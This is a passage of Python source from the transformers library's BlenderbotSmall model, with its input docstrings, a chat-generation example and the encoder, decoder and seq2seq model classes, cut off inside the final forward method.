>>> model = BlenderbotSmallForConditionalGeneration.from_pretrained(mname)
>>> tokenizer = AutoTokenizer.from_pretrained(mname)
>>> UTTERANCE = "My friends are cool but they eat too many carbs."
>>> print("Human: ", UTTERANCE)
Human: My friends are cool but they eat too many carbs.
>>> inputs = tokenizer([UTTERANCE], return_tensors="pt")
>>> reply_ids = model.generate(**inputs)
>>> print("Bot: ", tokenizer.batch_decode(reply_ids, skip_special_tokens=True)[0])
Bot: what kind of carbs do they eat? i don't know much about carbs.
>>> REPLY = "I'm not sure"
>>> print("Human: ", REPLY)
Human: I'm not sure
>>> NEXT_UTTERANCE = (
... "My friends are cool but they eat too many carbs.__end__ __start__what kind of carbs do they eat? "
... "i don't know much about carbs__end__ "
... "__start__ I'm not sure."
... )
>>> inputs = tokenizer([NEXT_UTTERANCE], return_tensors="pt")
>>> next_reply_ids = model.generate(**inputs)
>>> print("Bot: ", tokenizer.batch_decode(next_reply_ids, skip_special_tokens=True)[0])
Bot: they eat a lot of carbs. carbs are high in fat, protein, and fats.
```
"""
# Shared `forward` argument documentation, injected via `add_start_docstrings_to_model_forward`.
# Fix: `inputs_embeds` was fused onto the end of the `past_key_values` paragraph instead of
# being its own parameter entry, so it never rendered as a documented argument.
BLENDERBOT_SMALL_INPUTS_DOCSTRING = r"""
    Args:
        input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
            Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide
            it.
            Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
            [`PreTrainedTokenizer.__call__`] for details.
            [What are input IDs?](../glossary#input-ids)
        attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
            Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
            - 1 for tokens that are **not masked**,
            - 0 for tokens that are **masked**.
            [What are attention masks?](../glossary#attention-mask)
        decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
            Indices of decoder input sequence tokens in the vocabulary.
            Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
            [`PreTrainedTokenizer.__call__`] for details.
            [What are decoder input IDs?](../glossary#decoder-input-ids)
            BlenderbotSmall uses the `bos_token_id` as the starting token for `decoder_input_ids` generation. If
            `past_key_values` is used, optionally only the last `decoder_input_ids` have to be input (see
            `past_key_values`).
        decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*):
            Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also
            be used by default.
        head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
            Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`:
            - 1 indicates the head is **not masked**,
            - 0 indicates the head is **masked**.
        decoder_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
            Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`:
            - 1 indicates the head is **not masked**,
            - 0 indicates the head is **masked**.
        cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
            Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in `[0,
            1]`:
            - 1 indicates the head is **not masked**,
            - 0 indicates the head is **masked**.
        encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*):
            Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`)
            `last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of
            hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder.
        past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
            Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of shape
            `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of shape
            `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
            Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention
            blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
            If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that
            don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all
            `decoder_input_ids` of shape `(batch_size, sequence_length)`.
        inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
            Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation. This
            is useful if you want more control over how to convert `input_ids` indices into associated vectors than the
            model's internal embedding lookup matrix.
        decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*):
            Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded
            representation. If `past_key_values` is used, optionally only the last `decoder_inputs_embeds` have to be
            input (see `past_key_values`). This is useful if you want more control over how to convert
            `decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix.
            If `decoder_input_ids` and `decoder_inputs_embeds` are both unset, `decoder_inputs_embeds` takes the value
            of `inputs_embeds`.
        use_cache (`bool`, *optional*):
            If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding (see
            `past_key_values`).
        output_attentions (`bool`, *optional*):
            Whether or not to return the attentions tensors of all attention layers. See `attentions` under returned
            tensors for more detail.
        output_hidden_states (`bool`, *optional*):
            Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
            more detail.
        return_dict (`bool`, *optional*):
            Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
"""
class BlenderbotSmallEncoder(BlenderbotSmallPreTrainedModel):
    """
    Transformer encoder consisting of *config.encoder_layers* self attention layers. Each layer is a
    [`BlenderbotSmallEncoderLayer`].
    Args:
        config: BlenderbotSmallConfig
        embed_tokens (nn.Embedding): output embedding
    """
    def __init__(self, config: BlenderbotSmallConfig, embed_tokens: Optional[nn.Embedding] = None):
        super().__init__(config)
        self.dropout = config.dropout
        # probability of dropping a whole encoder layer during training (LayerDrop)
        self.layerdrop = config.encoder_layerdrop
        embed_dim = config.d_model
        self.padding_idx = config.pad_token_id
        self.max_source_positions = config.max_position_embeddings
        # optionally scale token embeddings by sqrt(d_model) (original Transformer convention)
        self.embed_scale = math.sqrt(embed_dim) if config.scale_embedding else 1.0
        if embed_tokens is not None:
            # share the token embedding passed in by the enclosing seq2seq model
            self.embed_tokens = embed_tokens
        else:
            self.embed_tokens = nn.Embedding(config.vocab_size, embed_dim, self.padding_idx)
        self.embed_positions = BlenderbotSmallLearnedPositionalEmbedding(
            config.max_position_embeddings,
            embed_dim,
        )
        self.layers = nn.ModuleList([BlenderbotSmallEncoderLayer(config) for _ in range(config.encoder_layers)])
        self.layernorm_embedding = nn.LayerNorm(embed_dim)
        self.gradient_checkpointing = False
        # Initialize weights and apply final processing
        self.post_init()
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        head_mask=None,
        inputs_embeds=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        Args:
            input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
                Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
                provide it.
                Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
                [`PreTrainedTokenizer.__call__`] for details.
                [What are input IDs?](../glossary#input-ids)
            attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
                [What are attention masks?](../glossary#attention-mask)
            head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*):
                Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
                - 1 indicates the head is **not masked**,
                - 0 indicates the head is **masked**.
            inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
                Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
                This is useful if you want more control over how to convert `input_ids` indices into associated vectors
                than the model's internal embedding lookup matrix.
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
            output_hidden_states (`bool`, *optional*):
                Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
                for more detail.
            return_dict (`bool`, *optional*):
                Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
        """
        # fall back to config defaults for any output flag not passed explicitly
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # retrieve input_ids and inputs_embeds
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
        elif input_ids is not None:
            self.warn_if_padding_and_no_attention_mask(input_ids, attention_mask)
            input_shape = input_ids.size()
            input_ids = input_ids.view(-1, input_shape[-1])
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
        else:
            raise ValueError("You have to specify either input_ids or inputs_embeds")
        if inputs_embeds is None:
            inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
        # learned positional embeddings are added to the (scaled) token embeddings
        embed_pos = self.embed_positions(input_shape)
        hidden_states = inputs_embeds + embed_pos
        hidden_states = self.layernorm_embedding(hidden_states)
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        # expand attention_mask
        if attention_mask is not None:
            # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
            attention_mask = _expand_mask(attention_mask, inputs_embeds.dtype)
        encoder_states = () if output_hidden_states else None
        all_attentions = () if output_attentions else None
        # check if head_mask has a correct number of layers specified if desired
        if head_mask is not None:
            if head_mask.size()[0] != len(self.layers):
                raise ValueError(
                    f"The head_mask should be specified for {len(self.layers)} layers, but it is for"
                    f" {head_mask.size()[0]}."
                )
        for idx, encoder_layer in enumerate(self.layers):
            if output_hidden_states:
                encoder_states = encoder_states + (hidden_states,)
            # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
            to_drop = False
            if self.training:
                dropout_probability = torch.rand([])
                if dropout_probability < self.layerdrop:  # skip the layer
                    to_drop = True
            if to_drop:
                # placeholders keep the output tuple indexable even for a dropped layer
                layer_outputs = (None, None)
            else:
                if self.gradient_checkpointing and self.training:
                    # wrap the layer so checkpoint() can forward output_attentions as a positional arg
                    def create_custom_forward(module):
                        def custom_forward(*inputs):
                            return module(*inputs, output_attentions)
                        return custom_forward
                    layer_outputs = torch.utils.checkpoint.checkpoint(
                        create_custom_forward(encoder_layer),
                        hidden_states,
                        attention_mask,
                        (head_mask[idx] if head_mask is not None else None),
                    )
                else:
                    layer_outputs = encoder_layer(
                        hidden_states,
                        attention_mask,
                        layer_head_mask=(head_mask[idx] if head_mask is not None else None),
                        output_attentions=output_attentions,
                    )
                hidden_states = layer_outputs[0]
            if output_attentions:
                all_attentions = all_attentions + (layer_outputs[1],)
        if output_hidden_states:
            encoder_states = encoder_states + (hidden_states,)
        if not return_dict:
            return tuple(v for v in [hidden_states, encoder_states, all_attentions] if v is not None)
        return BaseModelOutput(
            last_hidden_state=hidden_states, hidden_states=encoder_states, attentions=all_attentions
        )
class BlenderbotSmallDecoder(BlenderbotSmallPreTrainedModel):
    """
    Transformer decoder consisting of *config.decoder_layers* layers. Each layer is a [`BlenderbotSmallDecoderLayer`]
    Args:
        config: BlenderbotSmallConfig
        embed_tokens (nn.Embedding): output embedding
    """
    def __init__(self, config: BlenderbotSmallConfig, embed_tokens: Optional[nn.Embedding] = None):
        super().__init__(config)
        self.dropout = config.dropout
        # probability of dropping a whole decoder layer during training (LayerDrop)
        self.layerdrop = config.decoder_layerdrop
        self.padding_idx = config.pad_token_id
        self.max_target_positions = config.max_position_embeddings
        # optionally scale token embeddings by sqrt(d_model) (original Transformer convention)
        self.embed_scale = math.sqrt(config.d_model) if config.scale_embedding else 1.0
        if embed_tokens is not None:
            self.embed_tokens = embed_tokens
        else:
            self.embed_tokens = nn.Embedding(config.vocab_size, config.d_model, self.padding_idx)
        self.embed_positions = BlenderbotSmallLearnedPositionalEmbedding(
            config.max_position_embeddings,
            config.d_model,
        )
        self.layers = nn.ModuleList([BlenderbotSmallDecoderLayer(config) for _ in range(config.decoder_layers)])
        self.layernorm_embedding = nn.LayerNorm(config.d_model)
        self.gradient_checkpointing = False
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        return self.embed_tokens
    def set_input_embeddings(self, value):
        self.embed_tokens = value
    # Copied from transformers.models.bart.modeling_bart.BartDecoder._prepare_decoder_attention_mask
    def _prepare_decoder_attention_mask(self, attention_mask, input_shape, inputs_embeds, past_key_values_length):
        # create causal mask
        # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
        combined_attention_mask = None
        if input_shape[-1] > 1:
            combined_attention_mask = _make_causal_mask(
                input_shape,
                inputs_embeds.dtype,
                device=inputs_embeds.device,
                past_key_values_length=past_key_values_length,
            )
        if attention_mask is not None:
            # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
            expanded_attn_mask = _expand_mask(attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1]).to(
                inputs_embeds.device
            )
            combined_attention_mask = (
                expanded_attn_mask if combined_attention_mask is None else expanded_attn_mask + combined_attention_mask
            )
        return combined_attention_mask
    def forward(
        self,
        input_ids=None,
        attention_mask=None,
        encoder_hidden_states=None,
        encoder_attention_mask=None,
        head_mask=None,
        cross_attn_head_mask=None,
        past_key_values=None,
        inputs_embeds=None,
        use_cache=None,
        output_attentions=None,
        output_hidden_states=None,
        return_dict=None,
    ):
        r"""
        Args:
            input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`):
                Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you
                provide it.
                Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and
                [`PreTrainedTokenizer.__call__`] for details.
                [What are input IDs?](../glossary#input-ids)
            attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
                Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
                [What are attention masks?](../glossary#attention-mask)
            encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, encoder_sequence_length, hidden_size)`, *optional*):
                Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention
                of the decoder.
            encoder_attention_mask (`torch.LongTensor` of shape `(batch_size, encoder_sequence_length)`, *optional*):
                Mask to avoid performing cross-attention on padding tokens indices of encoder input_ids. Mask values
                selected in `[0, 1]`:
                - 1 for tokens that are **not masked**,
                - 0 for tokens that are **masked**.
                [What are attention masks?](../glossary#attention-mask)
            head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
                Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`:
                - 1 indicates the head is **not masked**,
                - 0 indicates the head is **masked**.
            cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*):
                Mask to nullify selected heads of the cross-attention modules in the decoder to avoid performing
                cross-attention on hidden heads. Mask values selected in `[0, 1]`:
                - 1 indicates the head is **not masked**,
                - 0 indicates the head is **masked**.
            past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`):
                Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of
                shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of
                shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`.
                Contains pre-computed hidden-states (key and values in the self-attention blocks and in the
                cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding.
                If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those
                that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of
                all `decoder_input_ids` of shape `(batch_size, sequence_length)`.
            inputs_embeds (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*):
                Optionally, instead of passing `input_ids` you can choose to directly pass an embedded representation.
                This is useful if you want more control over how to convert `input_ids` indices into associated
                vectors than the model's internal embedding lookup matrix.
            output_attentions (`bool`, *optional*):
                Whether or not to return the attentions tensors of all attention layers. See `attentions` under
                returned tensors for more detail.
            output_hidden_states (`bool`, *optional*):
                Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors
                for more detail.
            return_dict (`bool`, *optional*):
                Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple.
        """
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        use_cache = use_cache if use_cache is not None else self.config.use_cache
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # retrieve input_ids and inputs_embeds
        if input_ids is not None and inputs_embeds is not None:
            raise ValueError("You cannot specify both decoder_input_ids and decoder_inputs_embeds at the same time")
        elif input_ids is not None:
            input_shape = input_ids.size()
            input_ids = input_ids.view(-1, input_shape[-1])
        elif inputs_embeds is not None:
            input_shape = inputs_embeds.size()[:-1]
        else:
            raise ValueError("You have to specify either decoder_input_ids or decoder_inputs_embeds")
        # past_key_values_length
        past_key_values_length = past_key_values[0][0].shape[2] if past_key_values is not None else 0
        if inputs_embeds is None:
            inputs_embeds = self.embed_tokens(input_ids) * self.embed_scale
        attention_mask = self._prepare_decoder_attention_mask(
            attention_mask, input_shape, inputs_embeds, past_key_values_length
        )
        # expand encoder attention mask
        if encoder_hidden_states is not None and encoder_attention_mask is not None:
            # [bsz, seq_len] -> [bsz, 1, tgt_seq_len, src_seq_len]
            encoder_attention_mask = _expand_mask(encoder_attention_mask, inputs_embeds.dtype, tgt_len=input_shape[-1])
        # embed positions
        positions = self.embed_positions(input_shape, past_key_values_length)
        # BlenderbotSmall applies layer norm on hidden_states
        inputs_embeds = self.layernorm_embedding(inputs_embeds)
        hidden_states = inputs_embeds + positions
        hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training)
        if self.gradient_checkpointing and self.training:
            if use_cache:
                logger.warning_once(
                    "`use_cache=True` is incompatible with gradient checkpointing. Setting `use_cache=False`..."
                )
                use_cache = False
        # decoder layers
        all_hidden_states = () if output_hidden_states else None
        all_self_attns = () if output_attentions else None
        all_cross_attentions = () if (output_attentions and encoder_hidden_states is not None) else None
        next_decoder_cache = () if use_cache else None
        # check if head_mask/cross_attn_head_mask has a correct number of layers specified if desired
        for attn_mask, mask_name in zip([head_mask, cross_attn_head_mask], ["head_mask", "cross_attn_head_mask"]):
            if attn_mask is not None:
                if attn_mask.size()[0] != len(self.layers):
                    raise ValueError(
                        # report the size of the mask actually being checked (was `head_mask`, which gave a
                        # wrong count — or an AttributeError — when only `cross_attn_head_mask` was mis-sized)
                        f"The `{mask_name}` should be specified for {len(self.layers)} layers, but it is for"
                        f" {attn_mask.size()[0]}."
                    )
        for idx, decoder_layer in enumerate(self.layers):
            # add LayerDrop (see https://arxiv.org/abs/1909.11556 for description)
            if output_hidden_states:
                all_hidden_states += (hidden_states,)
            if self.training:
                dropout_probability = torch.rand([])
                if dropout_probability < self.layerdrop:
                    continue
            past_key_value = past_key_values[idx] if past_key_values is not None else None
            if self.gradient_checkpointing and self.training:
                # wrap the layer so checkpoint() can forward output_attentions/use_cache positionally
                def create_custom_forward(module):
                    def custom_forward(*inputs):
                        # None for past_key_value
                        return module(*inputs, output_attentions, use_cache)
                    return custom_forward
                layer_outputs = torch.utils.checkpoint.checkpoint(
                    create_custom_forward(decoder_layer),
                    hidden_states,
                    attention_mask,
                    encoder_hidden_states,
                    encoder_attention_mask,
                    head_mask[idx] if head_mask is not None else None,
                    cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None,
                    None,
                )
            else:
                layer_outputs = decoder_layer(
                    hidden_states,
                    attention_mask=attention_mask,
                    encoder_hidden_states=encoder_hidden_states,
                    encoder_attention_mask=encoder_attention_mask,
                    layer_head_mask=(head_mask[idx] if head_mask is not None else None),
                    cross_attn_layer_head_mask=(
                        cross_attn_head_mask[idx] if cross_attn_head_mask is not None else None
                    ),
                    past_key_value=past_key_value,
                    output_attentions=output_attentions,
                    use_cache=use_cache,
                )
            hidden_states = layer_outputs[0]
            if use_cache:
                # the present key/value cache is the last element of the layer's output tuple
                next_decoder_cache += (layer_outputs[3 if output_attentions else 1],)
            if output_attentions:
                all_self_attns += (layer_outputs[1],)
                if encoder_hidden_states is not None:
                    all_cross_attentions += (layer_outputs[2],)
        # add hidden states from the last decoder layer
        if output_hidden_states:
            all_hidden_states += (hidden_states,)
        next_cache = next_decoder_cache if use_cache else None
        if not return_dict:
            return tuple(
                v
                for v in [hidden_states, next_cache, all_hidden_states, all_self_attns, all_cross_attentions]
                if v is not None
            )
        return BaseModelOutputWithPastAndCrossAttentions(
            last_hidden_state=hidden_states,
            past_key_values=next_cache,
            hidden_states=all_hidden_states,
            attentions=all_self_attns,
            cross_attentions=all_cross_attentions,
        )
@add_start_docstrings(
    "The bare BlenderbotSmall Model outputting raw hidden-states without any specific head on top.",
    BLENDERBOT_SMALL_START_DOCSTRING,
)
class BlenderbotSmallModel(BlenderbotSmallPreTrainedModel):
    # Encoder and decoder reuse a single embedding matrix, so both state-dict keys
    # alias the same tensor for the weight-tying machinery.
    _tied_weights_keys = ["decoder.embed_tokens.weight", "encoder.embed_tokens.weight"]
    def __init__(self, config: BlenderbotSmallConfig):
        """Build the seq2seq backbone: one shared token embedding, an encoder and a decoder."""
        super().__init__(config)
        padding_idx, vocab_size = config.pad_token_id, config.vocab_size
        # Single embedding table shared by both sub-modules (tied input embeddings).
        self.shared = nn.Embedding(vocab_size, config.d_model, padding_idx)
        self.encoder = BlenderbotSmallEncoder(config, self.shared)
        self.decoder = BlenderbotSmallDecoder(config, self.shared)
        # Initialize weights and apply final processing
        self.post_init()
    def get_input_embeddings(self):
        # `shared` is the single source of truth for input embeddings.
        return self.shared
    def set_input_embeddings(self, value):
        # Re-point encoder and decoder at the new table so the tie is preserved.
        self.shared = value
        self.encoder.embed_tokens = self.shared
        self.decoder.embed_tokens = self.shared
    def get_encoder(self):
        return self.encoder
    def get_decoder(self):
        return self.decoder
    @add_start_docstrings_to_model_forward(BLENDERBOT_SMALL_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=Seq2SeqModelOutput, config_class=_CONFIG_FOR_DOC)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        decoder_input_ids: Optional[torch.LongTensor] = None,
        decoder_attention_mask: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        decoder_head_mask: Optional[torch.Tensor] = None,
        cross_attn_head_mask: Optional[torch.Tensor] = None,
        encoder_outputs: Optional[Union[Tuple, BaseModelOutput]] = None,
        past_key_values: Optional[List[torch.FloatTensor]] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        decoder_inputs_embeds: Optional[torch.FloatTensor] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple[torch.FloatTensor], Seq2SeqModelOutput]:
        r"""
        Returns:
        Example:
        ```python
        >>> from transformers import AutoTokenizer, BlenderbotSmallModel
        >>> model = BlenderbotSmallModel.from_pretrained("facebook/blenderbot_small-90M")
        >>> tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot_small-90M")
        >>> inputs = tokenizer("Studies have been shown that owning a dog is good for you", return_tensors="pt")
        >>> decoder_inputs = tokenizer("Studies show that", return_tensors="pt")  # Batch size 1
        >>> outputs = model(input_ids=inputs.input_ids, decoder_input_ids=decoder_inputs.input_ids)
        >>> last_hidden_states = outputs.last_hidden_state
        >>> list(last_hidden_states.shape)
        [1, 3, 512]
        ```"""
        # Per-call flags fall back to the model config when not supplied.
        output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
        output_hidden_states = (
            output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
        )
        use_cache = use_cache if use_cache is not None else self.config.use_cache
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        # Run the encoder only when the caller did not pass cached encoder outputs
        # (generation reuses them across decoding steps).
        if encoder_outputs is None:
            encoder_outputs = self.encoder(
                input_ids=input_ids,
                attention_mask=attention_mask,
                head_mask=head_mask,
                inputs_embeds=inputs_embeds,
                output_attentions=output_attentions,
                output_hidden_states=output_hidden_states,
                return_dict=return_dict,
            )
        # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True
        elif return_dict and not isinstance(encoder_outputs, BaseModelOutput):
            encoder_outputs = BaseModelOutput(
                last_hidden_state=encoder_outputs[0],
                hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None,
                attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None,
            )
        # decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn)
        decoder_outputs = self.decoder(
            input_ids=decoder_input_ids,
            attention_mask=decoder_attention_mask,
            encoder_hidden_states=encoder_outputs[0],
            encoder_attention_mask=attention_mask,
            head_mask=decoder_head_mask,
            cross_attn_head_mask=cross_attn_head_mask,
            past_key_values=past_key_values,
            inputs_embeds=decoder_inputs_embeds,
            use_cache=use_cache,
            output_attentions=output_attentions,
            output_hidden_states=output_hidden_states,
            return_dict=return_dict,
        )
        if not return_dict:
            # Legacy tuple output: decoder fields first, then encoder fields.
            return decoder_outputs + encoder_outputs
        return Seq2SeqModelOutput(
            last_hidden_state=decoder_outputs.last_hidden_state,
            past_key_values=decoder_outputs.past_key_values,
            decoder_hidden_states=decoder_outputs.hidden_states,
            decoder_attentions=decoder_outputs.attentions,
            cross_attentions=decoder_outputs.cross_attentions,
            encoder_last_hidden_state=encoder_outputs.last_hidden_state,
            encoder_hidden_states=encoder_outputs.hidden_states,
            encoder_attentions=encoder_outputs.attentions,
        )
@add_start_docstrings(
    "The BlenderbotSmall Model with a language modeling head. Can be used for summarization.",
    BLENDERBOT_SMALL_START_DOCSTRING,
)
class BlenderbotSmallForConditionalGeneration(BlenderbotSmallPreTrainedModel):
    base_model_prefix = "model"
    _keys_to_ignore_on_load_missing = ["final_logits_bias"]
    _tied_weights_keys = ["decoder.embed_tokens.weight", "encoder.embed_tokens.weight", "lm_head.weight"]
    def __init__(self, config: BlenderbotSmallConfig):
        """Wrap the seq2seq backbone with a (tied) LM head plus a resizable logits bias."""
        super().__init__(config)
        self.model = BlenderbotSmallModel(config)
        # Additive per-token bias on the LM logits. Kept as a buffer (not a parameter)
        # so it is saved/loaded with the checkpoint and resized together with the vocab.
        self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings)))
        self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False)
        # Initialize weights and apply final processing
        self.post_init()
    def get_encoder(self):
        return self.model.get_encoder()
    def get_decoder(self):
        return self.model.get_decoder()
    def resize_token_embeddings(self, new_num_tokens: int, pad_to_multiple_of: Optional[int] = None) -> nn.Embedding:
        """Resize the token embeddings and keep `final_logits_bias` at matching width."""
        new_embeddings = super().resize_token_embeddings(new_num_tokens, pad_to_multiple_of)
        self._resize_final_logits_bias(new_embeddings.weight.shape[0])
        return new_embeddings
    def _resize_final_logits_bias(self, new_num_tokens: int) -> None:
        # Truncate when shrinking the vocab; zero-pad when growing it.
        old_num_tokens = self.final_logits_bias.shape[-1]
        if new_num_tokens <= old_num_tokens:
            new_bias = self.final_logits_bias[:, :new_num_tokens]
        else:
            extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device)
            new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1)
        self.register_buffer("final_logits_bias", new_bias)
    def get_output_embeddings(self):
        return self.lm_head
    def set_output_embeddings(self, new_embeddings):
        self.lm_head = new_embeddings
    @add_start_docstrings_to_model_forward(BLENDERBOT_SMALL_INPUTS_DOCSTRING)
    @replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC)
    @add_end_docstrings(BLENDERBOT_SMALL_GENERATION_EXAMPLE)
    def forward(
        self,
        input_ids: Optional[torch.LongTensor] = None,
        attention_mask: Optional[torch.Tensor] = None,
        decoder_input_ids: Optional[torch.LongTensor] = None,
        decoder_attention_mask: Optional[torch.LongTensor] = None,
        head_mask: Optional[torch.Tensor] = None,
        decoder_head_mask: Optional[torch.Tensor] = None,
        cross_attn_head_mask: Optional[torch.Tensor] = None,
        encoder_outputs: Optional[Union[Tuple, BaseModelOutput]] = None,
        past_key_values: Optional[List[torch.FloatTensor]] = None,
        inputs_embeds: Optional[torch.Tensor] = None,
        decoder_inputs_embeds: Optional[torch.FloatTensor] = None,
        labels: Optional[torch.LongTensor] = None,
        use_cache: Optional[bool] = None,
        output_attentions: Optional[bool] = None,
        output_hidden_states: Optional[bool] = None,
        return_dict: Optional[bool] = None,
    ) -> Union[Tuple[torch.FloatTensor], Seq2SeqLMOutput]:
        r"""
        labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*):
            Labels for computing the masked language modeling loss. Indices should either be in `[0, ...,
            config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored
            (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`.
        Returns:
        """
        return_dict = return_dict if return_dict is not None else self.config.use_return_dict
        if labels is not None:
